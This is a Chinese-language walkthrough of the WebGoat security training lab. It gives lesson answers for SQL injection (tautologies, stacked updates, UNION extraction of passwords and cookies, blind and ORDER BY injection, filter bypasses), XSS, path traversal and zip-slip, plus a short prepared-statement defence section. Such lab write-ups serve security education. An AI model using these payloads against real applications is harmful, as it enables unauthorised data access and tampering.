WebGoat通关教程：SQL注入与Web安全漏洞详解<\/h1>

1. SQL Injection (intro)<\/h2>

1.1 基础SQL语句操作<\/h3>
1-2: 基本查询语句<\/p>
select<\/span> department from<\/span> Employees where<\/span> first_name=<\/span>'Bob'<\/span>
<\/span><\/span><\/code><\/pre>1-3: 更新语句<\/p>
update<\/span> employees set<\/span> department=<\/span>'Sales'<\/span> where<\/span> first_name=<\/span>'Tobi'<\/span>
<\/span><\/span><\/code><\/pre>1-4: 修改表结构<\/p>
alter<\/span> table<\/span> employees add<\/span> phone varchar(20<\/span>)
<\/span><\/span><\/code><\/pre>1-5: 权限修改<\/p>
grant<\/span> select<\/span> on<\/span> grant_right to<\/span> unauthorized_user
<\/span><\/span><\/code><\/pre>1.2 SQL注入基础<\/h3>
1-9: 基本SQL注入<\/p>

通过注入获取所有用户信息<\/li>
使用万能密码：' or '1'='1<\/code><\/li>
<\/ul>
1-10: 数字型注入<\/p>

数字注入无需考虑引号问题<\/li>
示例：1 or 1=1<\/code><\/li>
<\/ul>
1-11: 字符串注入<\/p>

再次练习获取全部用户信息<\/li>
<\/ul>
1-12: 组合注入攻击<\/p>

目标：修改Smith的工资为最高<\/li>
已知最高工资为83700<\/li>
注入语句：<\/li>
<\/ul>
aa' or '<\/span>1<\/span>'='<\/span>1<\/span>';update employees set salary=100000 where auth_tan='<\/span>3<\/span>SL99A
<\/span><\/span><\/code><\/pre>1-13: 清理痕迹<\/p>

删除日志表<\/li>
直接拼接DROP语句<\/li>
<\/ul>
2. SQL Injection (advanced)<\/h2>
2.1 UNION注入<\/h3>
2-3: 获取其他表数据<\/p>

使用UNION查询<\/li>
注意字段数量和类型匹配<\/li>
注入语句：<\/li>
<\/ul>
1<\/span>' or '<\/span>1<\/span>'='<\/span>1<\/span>' union select userid,user_name,password,cookie,'<\/span>aa','<\/span>bb',5 from user_system_data where '<\/span>1<\/span>'='<\/span>1<\/span>
<\/span><\/span><\/code><\/pre>2.2 盲注技术<\/h3>
2-5: 布尔盲注<\/p>

注册页面的username_reg存在注入点<\/li>
数据库类型：hsqldb<\/li>
判断password字段是否存在：<\/li>
<\/ul>
password is<\/span> not<\/span> null<\/span>
<\/span><\/span><\/code><\/pre>
确定密码长度(23)：<\/li>
<\/ul>
and<\/span> length<\/span>(password)=<\/span>23<\/span>
<\/span><\/span><\/code><\/pre>
逐字符爆破密码：<\/li>
<\/ul>
and<\/span> substring<\/span>(password,1<\/span>,1<\/span>)=<\/span>'a'<\/span>
<\/span><\/span><\/code><\/pre>
最终密码：thisisasecretfortomonly<\/code><\/li>
<\/ul>
2.3 过滤绕过技术<\/h3>
3-9: 空格过滤绕过<\/p>

使用注释替代空格：<\/li>
<\/ul>
1<\/span>'\/**\/or\/**\/'<\/span>1<\/span>'='<\/span>1<\/span>'\/**\/union\/**\/select\/**\/userid,user_name,password,cookie,'<\/span>aa','<\/span>bb',5\/**\/from\/**\/user_system_data\/**\/where\/**\/'<\/span>1<\/span>'='<\/span>1<\/span>
<\/span><\/span><\/code><\/pre>3-10: 关键词过滤绕过<\/p>

使用双写绕过：<\/li>
<\/ul>
1<\/span>'\/**\/or\/**\/'<\/span>1<\/span>'='<\/span>1<\/span>'\/**\/union\/**\/selselectect\/**\/userid,user_name,password,cookie,'<\/span>aa','<\/span>bb',5\/**\/frofromm\/**\/user_system_data\/**\/where\/**\/'<\/span>1<\/span>'='<\/span>1<\/span>
<\/span><\/span><\/code><\/pre>3-12: 排序注入<\/p>

通过ORDER BY CASE进行盲注<\/li>
示例：<\/li>
<\/ul>
order<\/span> by<\/span> case<\/span> when<\/span> (substring<\/span>((select<\/span> ip from<\/span> SERVERS where<\/span> hostname=<\/span>'webgoat-prd'<\/span>),1<\/span>,1<\/span>)=<\/span>'1'<\/span>) then<\/span> id else<\/span> ip end<\/span>
<\/span><\/span><\/code><\/pre>
目标IP前三位：104<\/li>
<\/ul>
3. SQL注入防御<\/h2>
3-5: 使用预编译语句<\/p>
PreparedStatement statement =<\/span> conn.<\/span>prepareStatement<\/span>(<\/span>"SELECT status FROM users WHERE name= ? and mail = ?"<\/span>);<\/span>
<\/span><\/span>statement.<\/span>setString<\/span>(<\/span>1<\/span>,<\/span> "aa"<\/span>);<\/span>
<\/span><\/span>statement.<\/span>setString<\/span>(<\/span>2<\/span>,<\/span> "bbm@com"<\/span>);<\/span>
<\/span><\/span><\/code><\/pre>4. Cross Site Scripting (XSS)<\/h2>
4.1 反射型XSS<\/h3>
4-2: 获取Cookie<\/p>
alert<\/span>(document.cookie<\/span>)
<\/span><\/span><\/code><\/pre>4-7: 输入验证漏洞<\/p>
<script<\/span>>alert<\/span>('hello'<\/span>)<\/script<\/span>>
<\/span><\/span><\/code><\/pre>4.2 隐藏XSS<\/h3>
4-10: 发现隐藏测试页面<\/p>

搜索前端代码找到隐藏URL：start.mvc#test<\/code><\/li>
<\/ul>
4-11: 利用隐藏URL执行XSS<\/p>

访问：start.mvc#test\/<script>...<\/script><\/code><\/li>
可能需要URL编码<\/li>
<\/ul>
5. 存储型XSS<\/h2>
5-3: 评论区XSS<\/p>

在评论区输入脚本<\/li>
点击edit查看控制台输出<\/li>
<\/ul>
6. Path Traversal<\/h2>
6.1 基础路径穿越<\/h3>
6-2: 基本路径穿越<\/p>

修改fullname参数：..\/test<\/code><\/li>
<\/ul>
6-3: 过滤绕过<\/p>

使用双重路径：....\/\/<\/code><\/li>
<\/ul>
6-4: 文件名参数漏洞<\/p>

漏洞转移到filename参数<\/li>
<\/ul>
6-5: 获取特定文件<\/p>

直接拼接文件名<\/li>
注意URL编码<\/li>
<\/ul>
6.2 ZIP解压漏洞<\/h3>
6-7: ZIP解压路径穿越<\/p>

创建包含恶意路径的ZIP文件<\/li>
示例文件名：.tmp\/evil.sh<\/code><\/li>
<\/ul>
总结<\/h2>
本教程详细介绍了WebGoat中SQL注入和常见Web安全漏洞的利用方法，包括：<\/p>

基础SQL注入技术<\/li>
高级注入技术(UNION注入、盲注)<\/li>
过滤绕过技巧<\/li>
XSS攻击(反射型、存储型、DOM型)<\/li>
路径穿越攻击<\/li>
防御措施(预编译语句)<\/li>
<\/ol>
每种攻击技术都提供了具体的利用示例和关键点说明，帮助学习者全面理解Web应用安全漏洞的原理和利用方法。<\/p>